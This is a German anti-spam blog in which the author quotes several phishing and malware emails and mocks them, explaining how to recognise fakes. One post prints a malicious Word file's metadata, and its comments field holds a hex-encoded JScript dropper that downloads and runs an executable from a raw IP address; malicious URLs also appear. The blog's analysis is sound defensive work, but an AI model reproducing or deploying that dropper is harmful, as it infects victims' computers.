Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.

Schlagwortarchiv „Sehr geehrter Kunde“

Domainregistrierung 2016 / 2017

Mittwoch, 14. September 2016

Bitte auf gar keinen Fall auf diese Spam reinfallen! Sie wird von Spamfiltern (noch) nicht sicher als Spam erkannt.

Von: .DE Deutsche Domain <info31 (at) deutschewebhost (punkt) com>
An: .DE Deutsche Domain <info31 (at) deutschewebhost (punkt) com>

Die Spam ist nicht an den Mailempfänger adressiert, sondern der Empfänger steht unsichtbar im BCC:-Header. Das bedeutet, dass diese Mail an mehrere Empfänger gegangen ist, und es passt gar nicht dazu, dass einer Einzelperson für eine Dienstleistung eine Rechnung zugestellt wurde.

Die Domains in der TLD .de werden übrigens nicht von einer obskuren „DE Deutsche Domain“ verwaltet, sondern von der DENIC eG. Spätestens jetzt ist klar, dass es sich um eine illegale und asoziale Spam handelt, die einfach in die virtuelle Mülltonne geworfen werden kann.

Sehr geehrte Frau / Herr,

Unternehmen, mit denen man einen Vertrag hat, sprechen ihre Kunden namentlich an.

Nachfolgend die Einzelheiten zu der Domainregistrierung für 2016 / 2017.

Für welche Domain? Ich verwalte mehrere. (Und nein, das ist keineswegs ungewöhnlich, sondern ein sehr häufiger Fall.)

Aber wenn der Spammer in seine Spam eine Domain wie tamagothi.de reinschreibt, dann wird sogar noch den naivsten Empfängern seines dummen Textes sofort klar, dass es nichts mit ihnen zu tun hat, dass es vermutlich Spam ist und dass sie die Spam einfach löschen können. Deshalb muss der Spammer – wenn er nicht weitere Daten zu seinem Opfer hat, mit denen er etwas Eindruck von Vertragsverhältnis schindet – anonym formulieren.

Wir hoffen, Sie ausreichend informiert zu haben.

Es soll ja Menschen geben, die sich einfach klar ausdrücken und nicht mehr zu hoffen brauchen, dass es ausreicht. :mrgreen:

Mit freundlichen Grüssen

Der – zugegebenermaßen recht entbehrliche – Buchstabe „ß“ fand sich wohl nicht auf der „deutschen“ Tastatur dieses Spammers.

Birgit Hoffmann

Kundendienst
DE Deutsche Domain
info@deutschedomain.com

Nach diesem grandiosen Abschluss ist gar nichts klar oder ausreichend. Insbesondere weiß niemand, um was zum hackenden Henker es hier eigentlich geht. An der Mail hängt noch ein Anhang, auf den in der Mail kein Bezug genommen wurde; es handelt sich um…

$ ls -lh Rechnung\ 232417.pdf 
-rw-rw-r-- 1 elias elias 1,4M Sep 14 11:29 Rechnung 232417.pdf
$ file Rechnung\ 232417.pdf 
Rechnung 232417.pdf: PDF document, version 1.5
$ _

…ein 1,4 MiB großes PDF-Dokument, das mit seinem Dateinamen den Eindruck erweckt, eine Rechnung zu sein.

Da es sich um eine Spam handelt, kann ich nur strikt davon abraten, das PDF in einem normalen PDF-Viewer oder gar in Adobes Acrobat zu öffnen. PDF-Dokumente können Javascript und eingebettete Inhalte (wie etwa Flash- oder Java-Applets) enthalten, die bei der Darstellung ausgeführt werden, und der Acrobat hat eine erhebliche Sicherheitsgeschichte. Auch, wenn zurzeit kein einziges Antivirus-Schlangenöl in diesem Dokument eine Schadsoftware erkennt, ist es gefährlich, eine solche Datei aus einer Spam zu öffnen.

Eine einfache (aber auch nicht völlig gefahrlose) Möglichkeit, sich das PDF trotzdem anzuschauen, ist es, das PDF in ein Grafikprogramm wie Gimp zu importieren. Dabei werden nur die sichtbaren Bereiche des Dokumentes in ein Bild umgewandelt, es kommt nicht zur Ausführung von eventuell enthaltenem Code. Warum das immer noch ein bisschen gefährlich ist? Nun, die Bibliotheken, mit denen PDFs geparst und in eine Grafik gezeichnet werden, könnten einen frisch gefundenen und noch unbehobenen Fehler enthalten, der von Kriminellen ausgebeutet wird. Wer ganz sicher gehen will, verwendet eine Betriebssysteminstallation in einer virtuellen Maschine.

Nachdem ich so wortreich klar gemacht habe, dass Spam gefährlich ist, ist die Zeit für den Anhang gekommen:

So sieht der Mailanhang aus

„Zahlen sie völlig grundlos an eine Unternehmung, mit der sie keinerlei Vertrag haben und die nicht einmal ihren Namen als Rechnungsempfänger einträgt, 195 Euro, und zwar binnen 14 Tagen“. Die Spammer gehen offenbar davon aus, dass von den mutmaßlich mehrere Millionen Empfängern mindestens ein Promille so dumm sein wird, auf diese Masche reinzufallen – und das wären schon mehrere tausend. Wenn es nur dreitausend sind, so kommt auf dem Konto mit der angegebenen IBAN in den nächsten Tagen mehr als eine halbe Million Euro an – Geld, das sicherlich nicht lange auf diesem Konto liegen bleibt, sondern von einem über Spam angeworbenen „Finanztransferagenten“ schnell abgeholt und weiterbefördert wird, um schließlich von anonym bleibenden Verbrechern für Koks und Nutten verprasst zu werden.

Man kann wirklich etwas Besseres mit den 195 Euro anfangen. Fallen Sie nicht auf diese Spam herein, und sagen Sie anderen Menschen weiter, was es mit dieser Spam auf sich hat! Von den gesparten rd. zweihundert Euro können Sie mir ja zwei Euro spenden, die ich dann für Lakritz, Kaffee, Kuchen, Zigaretten und Domainkosten verprassen werde… 😉

Diese Spam ist ein Zustecksel meines Lesers A.H. Danke!

Info von ihre Bank

Freitag, 12. August 2016

Ja, ich weiß, Spammer: Flektierende Sprachen sind wirklich schwierig zu beherrschen. Übung könnte einen Meister machen. Aber nicht bei dir, denn du willst ja nur spammen.

Sehr geehrter Kunde!

Diese Mail eines unbekannten Absenders beginnt mit der Behauptung, dass man dort „Kunde“ sei, aber der Name des „Kunden“ ist beim Absender offenbar nicht bekannt. Über diese Kleinigkeit geht er hinweg, indem er behauptet…

Ihre Bank hat die Lastschrift zuruck buchen lassen. Sie haben eine ungedeckte Rechnung bei HSH Nordbank.
Bitte laden Sie die Datei aus dem Link:
http://www.1800cloud.com/infos/report.doc

…dass man eine unbeglichene Rechnung hat, weil ein Bankkonto mit einer ungenannten Kontonummer nicht gedeckt war. Eine Rechnung für irgendwas. Bei irgendwem. Über irgendeinen Betrag. Von irgendwann. Irgendetwas Näheres zur angeblichen Sache kann man nur erfahren, wenn man ein Word-Dokument öffnet, das in der anonym formulierten E-Mail eines Unbekannten verlinkt wurde.

Wenn man das nicht sofort und möglichst hirnlos tut…

Aufgrund des andauernden Zahlungsruckstands sind Sie verpflichtet auberdem [sic!], die durch unsere Beauftragung entstandenen Kosten von 19,67 Euro zu bezahlen. Wir erwarten die Zahlung bis spatestens 17.08.2016 auf unser Konto. Namens und in Vollmacht unseren Mandanten fordern wir Sie auf, die offene Forderung sofort zu begleichen.

Bitte beachten Sie, dass keine weitere Mahnung erfolgt. Nach Ablauf der festgelegten Frist wird die Angelegenheit dem Staatsanwalt und der Schufa ubergeben. Die vollstandige Forderungsausstellung, der Sie alle Positionen entnehmen konnen, fugen wir bei. Fur Ruckfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des selben Zeitraums.

…geht es gleich zu Staatsanwalt und Schufa, statt ganz normal beim zuständigen Mahngericht einen Mahnbescheid zu beantragen. Der Spammer weiß ja genau, dass Angst dumm macht – und man muss schon ein bisschen dumm sein, um eine Datei zu öffnen, die einem mit Spam zugestellt wurde.

Leben Sie wohl!

Geh sterben, Spammer!

Die angehängte Datei ist…

$ file report.doc | sed 's/, /\n/g'
report.doc: Composite Document File V2 Document
Little Endian
Os: Windows
Version 6.1
Code page: 1251
Title:  
Subject: b
Author: c
Keywords: g
Comments: 66756e6374696f6e20737461727428297b7472797b76617220783d6e657720416374697665584f626a65637428226d73786d6c322e786d6c6874747022293b76617220663d6e657720416374697665584f626a6563742822736372697074696e672e66696c6573797374656d6f626a65637422293b76617220773d6e657720416374697665584f626a6563742822777363726970742e7368656c6c22293b76617220613d6e657720416374697665584f626a656374282261646f64622e73747265616d22293b76617220703d772e457870616e64456e7669726f6e6d656e74537472696e6773282225746d702522292b225c5c33313230392e657865223b782e6f70656e2822474554222c22687474703a2f2f38382e3131392e3137392e3136302f316269796375686f7165747a6f776161776e6561622e657865222c66616c7365293b782e73656e6428293b696628782e737461747573203d3d20323030297b696628662e66696c65657869737473287029297b662e64656c65746566696c652870293b7d612e6f70656e28293b612e747970653d313b612e777269746528782e726573706f6e7365626f6479293b612e73617665746f66696c652870293b612e636c6f736528293b772e72756e28702c312c30293b7d7d63617463682865297b7d7d
Template: Normal.dot
Last Saved By: admin
Revision Number: 2
Name of Creating Application: Microsoft Office Word
Create Time/Date: Sat Aug  6 17:17:00 2016
Last Saved Time/Date: Sat Aug  6 17:17:00 2016
Number of Pages: 1
Number of Words: 23
Number of Characters: 116
Security: 0
$ _

…ein in null Sekunden erstelltes Dokument für Microsoft Word, das 23 Wörter auf einer Seite enthält. Wer es öffnet und trotz der Warnung die Ausführung von Makros in Word zulässt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. Damit man auch wirklich so dumm ist, trotz der Warnung den Programmcode von Spammer ausführen zu lassen, steht ein Hinweis im Dokument:

Attention! This document was created in a newer version of Microsoft Office. To display the contents of the document need to enable macros

Kurz und schnell gesagt: Es handelt sich um Schadsoftware. Natürlich ist es wieder einmal die frischeste Brut der Kriminellen, und deshalb wird der verbrecherische Müll (der vermutlich einen Erpressungstrojaner aus dem Internet nachlädt) zurzeit nur von einer Minderheit der gängigen Antivirus-Schlangenöle erkannt. Wer sich auf sein Antivirus-Programm verlassen hat, ist also wieder einmal verlassen.

Deshalb ist es so wichtig, niemals auf derartige Spam hereinzufallen, sondern sie zu erkennen. Das ist in diesem Fall relativ einfach gewesen:

  1. Man ist angeblich Kunde, wird aber in einer E-Mail nicht persönlich angesprochen.
  2. Es ist völlig unklar, wer der Absender der E-Mail ist. Es gibt keinerlei Angaben für eine eventuelle Rückfrage.
  3. Es ist eine angebliche Mahnung, aber im Text der Mail fehlen sämtliche Angaben zum Gegenstand der Mahnung. Stattdessen soll in die Mail geklickt werden, um zu erfahren, um was es überhaupt geht.
  4. Der Text der Mail strotzt vor beängstigendem Bullshit, der in dieser Form niemals von einem Kaufmann oder einem Rechtsanwalt geschrieben würde.
  5. „Leben Sie wohl!“ als Abschiedsformel bedarf keiner weiteren Kommentierung

Generell sind Dateien, die ohne vorherige Absprache mit E-Mail zugestellt wurden, mit äußerster Vorsicht zu behandeln. E-Mail ist bei Kriminellen so beliebt, weil es sich um einen Weg handelt, jemanden anders Dateien und ausführbaren Code auf die Festplatte zu spielen – und zwar mit beliebig fälschbarem Absender. Auch bei bekannten Absendern niemals eine derartige Datei öffnen, ohne vorher auf einem anderen Weg als über E-Mail (zum Beispiel telefonisch) kurz Rücksprache gehalten zu haben! Antivirus-Programme nützen gar nichts. Ich wiederhole, weil die Werbung und die Computerjournaille ständig das Gegenteil behauptet: Antivirus-Programme nützen gar nichts. Wenn man sich darauf verlässt, sind sie sogar gefährlich. Das beste Antivirus-Programm ist und bleibt das Gehirn.

Sparda Bank – Aktueller Sicherheitshinweis

Samstag, 28. Mai 2016

Aber ich bin da doch gar nicht. Ach, ist ja auch eine Spam.

Lange kein Phishing mehr gehabt.

Sparda Bank – Aktueller Sicherheitshinweis

Das steht doch schon im Betreff.

Sehr geehrter Kunde, Grüße von Ihrer Sparda-Bank!

Genau mein Name!

Spätestens an dieser Stelle sollte jeder bemerken, dass es sich um eine Spam handelt. Eine echte E-Mail der Sparda-Bank würde nämlich immer…

  1. …den Kunden persönlich und namentlich ansprechen; und
  2. …möglichst früh im Text angeben, auf welchen Vertrag oder welches Konto sich die E-Mail bezieht, denn viele Kunden haben mehrere Konten oder laufende Darlehen oder dergleichen.

Nur kann sich der Spammer halt keine Kontonummer ausdenken, die bei jedem Empfänger passt. Aber „sehr geehrter Kunde“ passt immer.

Wir haben festgestellt, dass Sie Ihre persönlichen Daten bis heute nicht bestätigt haben.

Aha, darum geht es also in einem „aktuellen Sicherheitshinweis“. Und ich dachte schon, da steht drin, dass die Geldautomaten heute im Jackpot-Modus laufen und dass man eventuell überschüssige ausgegebene Banknoten doch bitte zur Filiale bringen soll, um riesige Geldverluste bei der Bank seines Vertrauens zu vermeiden. 😉

Aber das Beste an diesem Phishing-Trick ist: Wie, jetzt erst wollen die meine Daten? Nicht schon, als ich angeblich Kunde geworden bin? Haben die mir einfach Geld gegeben, ohne sich ein Ausweisdokument von mir zeigen zu lassen?

Diese Phisher denken sich doch immer wieder so richtig extratolle Gründe aus, um Leute dazu zu bringen, dass sie ihr Konto Kriminellen zur Verfügung stellen.

Tatsächlich hat es aber für die Sicherheit überhaupt keinen Wert, wenn man gegenüber einer Bank (oder sonstigen Unternehmung) lauter Daten noch einmal angibt, die der Bank (oder sonstigen Unternehmung) längst bekannt sind. Die einzigen, die an solchen Angaben Interesse haben können und die deshalb solche Angaben einfordern, sind gewerbsmäßig agierende Betrüger, die sich für die Datenakquise als Bank (oder sonstige Unternehmung) ausgeben, um danach mit dem Geld anderer Leute mal so richtig groß einkaufen zu gehen.

Um Ihnen weiterhin einen sicheren Service anbieten zu können, ist die Bestätigung Ihrer persönlichen Daten notwendig. Ihr Nutzerkonto wurde temporär gesperrt.

Wie bitte? Was hat die Korrektmeit „meiner persönlichen Daten“ mit der Sicherheit der Dienstleistung einer Bank zu tun? Die hätte auch sicher zu sein, wenn ich nur als Daisy Duck aus Entenhausen bekannt wäre.

Nach Abschluss der Bestätigung wird Ihr Nutzerkonto automatisch freigeschaltet.
Die Bestätigung können Sie über den unten ausgeführten Button starten.

Die gleichen Leute, die im vorigen Absatz von „Sicherheit“ gefaselt haben, erzählen jetzt, dass ich die „Sicherheit“ durch einen Klick in eine nicht digital signierte E-Mail herstellen kann, wie sie mir jeder der potenziell acht Milliarden Internetteilnehmer zusenden könnte. Das sind Spezialexperten für Sicherheit! Und damit wirklich ein paar Naive so dumm sind, dass sie darauf reinfallen…

Kommen Sie dieser E-Mail innerhalb 14 Tagen nicht nach, ist die Freischaltung nur über den Postweg möglich. Dabei wird eine Bearbeitungsgebühr in Höhe von 79,95€ fällig, welche wir anschließend von Ihrem Konto abbuchen werden.

…werden in ein paar Tagen angeblich grundlos achtzig Euro fällig, weil man auf eine E-Mail nicht reagiert – was ja auch daran liegen könnte, dass die Zustellung gescheitert ist, dass die E-Mail als Spam aussortiert wurde oder dass sie an eine wegen Spamverseuchung nicht mehr aktiv genutzte E-Mail-Adresse geht. Deshalb kommen derartige Fristsetzungen aus Gründen der Rechtssicherheit ja auch nicht über E-Mail, sondern immer mit der Sackpost.

Jetzt anmelden

Der Link führt natürlich nicht zur Website der Sparda-Bank, sondern zum Server mit der IP-Adresse 190.123.45.36 (nein, es wird im Link keine Domain verwendet), der im sonnigen Panama gehostet ist. Alles, was man dort an Daten eingibt, geht direkt an Verbrecher.

Immerhin hat der Hoster schnell auf die Abuse-Mail reagiert. Der von den Phishern angemietete Server ist bereits vom Netz. Vermutlich wird jetzt ein anderer Server irgendwo auf der Welt verwendet.

Wir bitten Sie die Umstände zu entschuldigen und bedanken uns bei Ihnen für Ihr Verständnis.

Oh, so ein pseudohöflicher Dank nach einer unverschämten Belästigung ist genau das, was in mir immer das akute Bedürfnis nach negativem sozialen Feedback in Form eines eingeschlagenen Fressbrettes auslöst. Leider hat der Idiot von Spammer dieses kleine Juwel der Kundenverachtung aus echten Texten echter Unternehmungen abgeschrieben – ich durfte derartige Unverschämtheiten jedenfalls immer wieder einmal lesen. Bei jemanden, der kein Masochist ist, sollten derartige Phrasen nur dazu führen, dass man Verträge so schnell wie möglich (und im Zweifelsfall unter Vorwand) kündigt und derart kundenverachtende Klitschen mit ihrer Arschlochsprache fortan vollständig meidet.

Mit freundlichen Grüßen
Ihre Sparda Bank

Mit intelligenzverachtenden Grüßen
Dein Phishing-Spammer

Diese Spam ist ein Zustecksel meines Lesers M.S.

Auszahlungsbestätigung für gammelfleisch@tamagothi.de (Bitte Jetzt Bestätigen!)

Donnerstag, 5. Mai 2016

Hallo gammelfleisch@tamagothi.de!

Das ist ja genau mein Name!

Sehr geehrter Kunde!

Und schon wieder mein Name! Woher kennt der Spammer den nur?! 😀

Hiermit übersenden wir Ihnen Ihre Auszahlungsbestätigung für offenes Guthaben in der Höhe von:

für Ihr Benutzerkonto mit folgender E-Mail Adresse:

  • gammelfleisch@tamagothi.de

Merken wir uns: Geld wird an Mailadressen (oder an Benutzerkonten) gezahlt, nicht an Leute, die es auch ausgeben könnten.

„Kreativ“ ist hier die Verwendung der Auszeichnung für eine unsortierte Liste mit nur einem einzigen Element. Auch Dummheit kann kreativ machen.

Bitte KLICKEN SIE HIER um Ihre Auszahlung anzufordern!

Genau, das hat in der hingestümperten Spam noch gefehlt. Ein „Click here“, der dümmste Linktext, den man in eine Mail reinschreiben kann. Da kann man sich dann Geld klicken, das einem grundlos gegeben wird, weil man so eine schöne Mailadresse hat. Sehr glaubwürdig. Und wer jetzt wissen will, um was es geht…

Bei weiteren Fragen steht Ihnen der Kunden Support auf der Website zu verfügung.

…muss ebenfalls klicken. Auf einen Link, der über ein Tracking-Skript in der Domain webimpossible (punkt) com geht. Keine gute Idee, das zu tun.

Wer es sich sparen will: Es geht nach einer längeren Kaskade von Weiterleitungen dann wieder zum Sir William Bot, der alle Menschen wie von allein so richtig reich macht. Eigentlich schade, dass der Spammer den nicht selbst benutzt, sondern lieber ein paar klimprige Affilate-Groschen dafür kassiert, dass er windigen Brokern ein paar Kunden zutreibt. Warum der Reichwerdexperte seine Reichwerdmethode nicht selbst benutzt? Ach, das klärt sich durch kurzes Nachdenken.

Mit freundlichen Grüßen

Walther Marengold
VIP Customer

So so, von einem ganz very impotent wichtigem Kunden… :mrgreen:

Gesehen, gelacht, gelöscht.

Buchung/Rechnung DH80RK

Dienstag, 1. März 2016

Von: Nurflug.de <info (at) nurflug (punkt) de>

Nein, diese Spam hat niemals einen Server von nurflug (punkt) de gesehen. Sie wird über Botnetze aus kriminell übernommenen Computern versendet. Eines meiner Exemplare kam aus Bangalore, Karnataka, Indien; und ein anderes meiner Exemplare kam aus New Delhi, ebenfalls Indien. In beiden Fällen handelte es sich um dynamisch vergebene IP-Adressen, also mit an Sicherheit grenzender Wahrscheinlichkeit um Privatrechner, die mit Schadsoftware übernommen wurden. Zum Beispiel, weil ihre Besitzer Mailanhänge geöffnet haben…

Sehr geehrte/r Kundin/Kunde,

Ich bin also Kunde, aber ich habe keinen Namen.

vielen Dank für Ihre Buchung DH80RK

Ich habe also etwas gebucht, aber das hat nur eine Nummer.

In der Anlage übermitteln wir Ihnen Ihre Bestätigung/Rechnung im PDF Format.

Geld kostet es mich auch noch. Wenn ich rauskriegen will, um was zum hackenden Henker es überhaupt geht, „muss“ ich einen Anhang öffnen.

Sollten Sie das PDF Dokument nicht öffnen können, so erhalten Sie den Acrobat Reader dazu kostenlos unter www.adobe.de

Wir wünschen Ihnen eine schöne und erholsame Reise !

Ihr Reise- & Buchungsservice Team

PS: Beachten Sie bitte unsere geänderten AGBs die wir für Sie unter http://www.nurflug.de/agb/ bereitgestellt haben.

Blah! Einmal das übliche Geschwurbel, mit dem Spammer davon ablenken wollen, dass in Wirklichkeit nur das Folgende in der Spam steht: „Obwohl wir sie nicht kennen und sie von uns nur einen beliebig fälschbaren Absender kennen, seien sie doch bitte so angstblöd, dass sie nur wegen solcher Wörter wie Rechnung und Buchung ganz schnell einen Anhang aus einer E-Mail unbekannter Zeitgenossen öffnen“.

Wer hier häufiger mitliest, wird es sich schon denken können: Es ist keine Rechnung, sondern eine Schadsoftware. Der Anhang ist ein ZIP-Archiv, in dem nicht etwa ein PDF-Dokument liegt, sondern ein vorsätzlich unverständlich formuliertes Javascript-Programm für den Windows Scripting Host, das eine ausführbare Datei aus dem Internet nachlädt und ausführt. Wer das Archiv auspackt und unter Microsoft Windows einen Doppelklick auf diese Datei macht, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. Diese klare Schadsoftware wird zurzeit von den meisten Antivirus-Programmen nicht als Schadsoftware erkannt.

Wer aber äußerste Vorsicht mit E-Mail-Anhängen übt; wer einen Anhang nur aufmacht, wenn dieser vorher (und über einen anderen Kanal als E-Mail) ausdrücklich vereinbart wurde; wer mit den typischen Maschen der Kriminellen vertraut ist; wer sich nicht von Behauptungen in Angst versetzen lässt – tja, der hat diese Spam einfach gelöscht und dem Antivirus-Schlangenöl gar nicht erst die Chance gegeben, daran zu versagen.

auffallige Aktivitaten

Samstag, 20. Februar 2016

Und ein auffälliger Mangel an Umlauten.

Von: „PayPal Deutschland“ <bray (punkt) james (at) no (strich) army (punkt) kiev (punkt) ua>

Komm Spammer! Wenn du schon den Absender fälschst… 😀

19.02.2016

Ja, dieses Datum hatten wir gestern tatsächlich. Das ist zwar eine überflüssige Angabe, weil das Datum sowieso in den Mailheadern steht, aber immerhin ist es richtig. Und Richtiges in einer Spam ist ja keine Selbstverständlichkeit.

Sehr geehrte/r Kunde/in,

Der Absender kennt – im Gegensatz zum echten PayPal – keinen Namen und weiß nicht einmal, ob er es mit Männlein oder Weiblein zu tun hat.

Bitte unterstützen Sie uns dabei, Ihr PayPal-Konto wieder in Sicherheit zu bringen. Bis dahin haben wir den Portal zu Ihrem PayPal-Kundenkonto vorübergehend eingeschränkt.

So so, „in Sicherheit bringen“. :mrgreen:

Wo liegt das Sachverhalt?

Bei Ihrer letzten Meldung sind uns auffällige Vorgänge aufgefallen.

Aha! :mrgreen:

Was mache ich umgehend?

Bitte verifizieren Sie sich über folgenden Button durch einen Abgleich Ihrer Informationen als rechtmäßiger Inhaber. Nachfolgend können Sie Ihr Paypal-Konto wieder uneingeschränkt gebrauchen:

Hier klicken

Der Link geht natürlich nicht zur Website in der Domain von PayPal, sondern in die deutlich weniger Vertrauen erweckende Domain payalready (punkt) com, die…

$ whois payalready.com | grep '^Creation'
Creation Date: 2016-02-11T22:22:18Z

…gerade erst vor neun Tagen eingerichtet wurde. Natürlich anonym, über einen Whois-Anonymisierer aus dem trockenen, warmen Australien.

Was immer man dort an Daten eingibt, geht direkt an Kriminelle.

Mit freundlichen Grüßen

Ihr Team von PayPal Deutschland

Wenn das die Freundlichkeit ist…

Sie möchten mit uns Kontakt aufnehmen?
Unsere Kundenhotline erreichen Sie unter 0180 500 88 xx
(Mo.-Fr. 8.00 bis 21.30 Uhr und Sa.-So. 9.00 bis 19.30 Uhr. Für Anrufe aus dem Festnetz fallen maximal 14 Cent/Min. an, aus Mobilfunknetzen sind es maximal 42 Cent/Min.)

Hier finden Sie weitere Informationen:
Online-Shops | Sicherheit | Passwort vergessen

Oh, toll: Links auf „weitere Informationen“, die gar nicht erst funktionieren.

Helfen Sie uns, Paypal noch besser, einfacher, übersichtlicher und sicherer zu machen.

Gern doch, PayPal. Fang doch mal damit an, deine richtigen Mails digital zu signieren und deine Kunden immer wieder darüber aufzuklären, was eine digitale Signatur ist und wie man diese überprüft! Damit könntest du dem dummen Phishing, wie es auch hier vorliegt, einfach nach und nach den Boden unter den Füßen wegziehen. Und das Beste daran: Für diesen signifikanten Zugewinn an Sicherheit musst du praktisch kein Geld investieren. Die Software, die du dafür brauchst, ist Frei und seit zwei Jahrzehnten für jeden verfügbar, der sie nutzen will. Der einzige Grund, weshalb du das nicht machst, PayPal, kann nur sein, dass dir die Schäden bei deinen Kunden scheißegal sind. Du, PayPal, du bist die Kriminalität, denn du arbeitest ihr seit Jahren zu.

Copyright © 1999–2012 PayPal. Alle Rechte vorbehalten. PayPal (Europe) S.à r.l. et Cie, S.C.A., Société en Commandite par Actions. Eingetragener Firmensitz: 22–24 Boulevard Royal, L-2449 Luxembourg RCS Luxembourg B 118 349.

Oh, das „Copyright“ auf diese Drecksmail ging nur bis 2012… 😀

Ach! Entf!

Diese Spam der Gattung „schlecht gemachtes, mieses Phishing“ ist ein Zustecksel meines Lesers S.W.

Sparkasse Online-Konto Aktualisierung

Freitag, 18. September 2015

Ein Qualitätsbetreff und dazu Qualitätsdeutsch:

Sehr geehrter Kunde,

Wir sind derzeit die Aktualisierung unserer Datenbank [sic!] und alle Online-Banking-Konten müssen aktualisiert und. [sic! Satz endet hier] Um können wieder aktiviert werden, auch weiterhin diesen Vorteil zu nutzen, bitten wir Sie Ihre Daten in den folgenden Link, um zu bestätigen:

Sparkasse Online-Konto Aktualisierung: Klicken Sie hier

Dank für Ihre Mitarbeit und Verständnis.

Mit freundlichen Grüßen.
Ihre Sparkasse Kundenservice.

Überflüssig zu erwähnen…

  1. …dass eine Sparkasse nicht solche E-Mails schreibt.
  2. …dass eine Sparkasse in jeden Brief und in jede E-Mail hineinschreiben würde, welche Sparkasse sie ist, denn es gibt derer viele.
  3. …dass niemand einen namentlich bekannten Kunden mit „Sehr geehrter Kunde“ ansprechen würde, wenn er den Kunden auch behalten möchte.
  4. …dass sehr viele Bankkunden mehrere Konten haben und dass deshalb in jeder Korrespondenz einer Bank die Kontonummer erwähnt würde, auf die sich der Vorgang bezieht.
  5. …dass die Website der richtigen Sparkasse nicht im Upload-Verzeichnis eines von Kriminellen gecrackten WordPress-Blogs aus den USA liegt.
  6. …dass es für jeden nur denkbaren Zweck vollkommen sinnlos ist, wegen einer technischen Änderung auf seiten einer Bank dieser Bank jede Menge Daten erneut angeben zu müssen, die diese Bank schon lange kennt und in vielfachen Sicherungskopien vorliegen hat.
  7. …dass der Linktext „Klicken Sie hier“ ein unzweifelhaftes Kennzeichen für Spam oder völlig unseriöse Werbung ist und immer alle Alarmglocken schrillen lassen sollte¹.

Aber was erzähle ich! Leider wird es trotzdem wieder nach Versand einiger Millionen von diesen Phishing-Spams zehn bis fünfzehn naive Menschen geben, die darauf reinfallen und damit Verbrechern ihr Konto für allerlei „Geschäfte“ zur Verfügung stellen. Oder vielleicht auch hundert bis hundertfünfzig. Oder sogar noch mehr. Das genaue Ausmaß dieses Wahnsinns kennen wohl nur die Banken und die Polizeien. Die Tatsache, dass die Phishing-Spams für Bankkunden heute zum größten Teil noch so genau dumm sind, wie sie es vor zehn Jahren auch schon waren, belegt nur eines: Dass diese Spams immer noch erfolgreich genug sind, so dass es sich für die Verbrecher schlicht nicht lohnt, ihre Verfahren zu verbessern.

Denn die geben sich keine Mühe. Sonst könnten sie ja gleich arbeiten gehen.

¹Führt bei mir direkt in den Spamordner. Fehlerkennungen: keine. Kein Mensch würde so einen dummen Linktext schreiben, wenn er sich auch nur eine Spur Gedanken macht, wie das beim Empfänger wirkt. Nur Werber und Spammer schreiben so.

Betreff: Wichtige Erneuerungen im Online Banking

Dienstag, 8. September 2015

Schön, dass du im Betreff erwähnst, dass es sich um einen Betreff handelt. Da wäre ich sonst niemals drauf gekommen.

Absender: comdirect bank AG <kundendienst (at) comdirect (punkt) de>

Wer sich unsicher ist: Nein, diese Spam kommt nicht von der Comdirect Bank, sondern von Kriminellen – der Absender ist gefälscht. Wer mir das nicht glaubt, kann ja mal die echte Comdirect Bank fragen.

Sehr geehrte Kundin,
Sehr geehrter Kunde,

Genau mein Name. Und: Genau meine Kontonummer.

Es soll ja Leute geben, die mehrere Konten führen, und das sind gar nicht so wenige. Deshalb wird eine echte Bank in jeder Korrespondenz angeben, auf welches Konto sich der Vorgang bezieht.

Bitte beachten Sie, dass Ihr Online-Banking Zugang bald abläuft, da dieser noch nicht unserem neuen Online-Banking System angepasst wurde.

So so, und wieso ist das mein Problem? Bin ich Admin bei euch? Pflege ich eure Datenbanken? Was kommt als nächstes? „Ihre Überweisung konnte nicht durchgeführt werden, weil sich ihre Kundendaten noch im alten Datenformat befinden“? Oder: „Sie können kein Geld vom Automaten abheben, weil wir unsere Steuerung noch nicht an die neuen Geräte angepasst haben“?

Dies hätte automatisch erfolgen sollen, wurde aber bei einigen Online-Banking Zugängen wegen Überlastung unseres Servers nicht abgeschlossen.

Ach so! Ihr habt nur einen Server, und wenn der um den Ersten rum mal ein bisschen heißläuft, dann kann darauf halt nichts anderes mehr laufen. Ich verstehe!

Diese Online-Banking Zugänge müssen nun manuell aktiviert werden, um einer automatischen Sicherheitssperrung vorzubeugen.

Und, was habe ich damit zu tun, wenn ihr eurer technisches Verfahren ändert? Macht mal! Viel Glück!

Ich blogge hier zum Beispiel über Spam, und als Blogging-System verwende ich WordPress. Davon gibt es manchmal eine neue Version, und dann müssen sogar ein paar Änderungen an der Datenbank durchgeführt werden. Dafür läuft dann ein Skript durch, und kein Leser oder Kommentator oder RSS-Nutzer bekommt davon etwas anderes mit, als dass das Blog für ein paar Sekündchen nicht zur Verfügung steht, um danach völlig problemlos wieder da zu sein.

Der Vergleich mag banal klingen, aber genau so ist das auch bei großen Systemen: Die Änderungen sind systematisch und sie werden automatisch mit einem Skript durchgeführt. Das können Computer ziemlich gut¹… 😉

Sollte Ihr Zugang aus Sicherheitsgründen gesperrt werden, müssen Sie bis zu 28 Tagen warten, bis Sie Zugangsdaten für das neue Online-Banking per Post erhalten und Ihr Online-Banking wieder nutzen können.

Ich wusste ja schon, dass die Sackpost langsam geworden ist, aber das so ein Brief jetzt einen ganzen Monat braucht… :mrgreen:

Bitte führen Sie daher die Aktualisierung so schnell wie möglich durch, um Probleme in Ihrem Online-Banking zu vermeiden. Um Ihren Online-Banking Zugang jetzt zu aktivieren, melden Sie Sich zunächst hier bei Ihrem Online Banking an, und füllen Sie das Online-Formular aus:

Klicken Sie hier – >

Der Link führt natürlich nicht in die Domain der Comdirect Bank, sondern in ein von Kriminellen gecracktes WordPress-Blog, in dem eine Seite hochgeladen wurde, die „liebevoll“ das Design der Comdirect Bank nachbildet. Dort kann man sich anmelden und den Verbrechern anschließend ganz viele Daten mitteilen, die die echte Comdirect Bank schon lange kennt.

Wer darauf reingefallen ist, sollte sich sofort mit seiner Bank in Verbindung setzen, um weiteren Schaden zu vermeiden.

Nach Ausfüllen des Formulars haben Sie den ersten Schritt zur Aktivierung des neuen Online-Bankings beendet. Wir danken Ihnen für Ihre Mitarbeit und Ihr Verständnis

Oh, wie nett, mir wird für meinen ersten Schritt, meine Mitarbeit und mein (nicht vorhandenes) Verständnis gedankt, und…

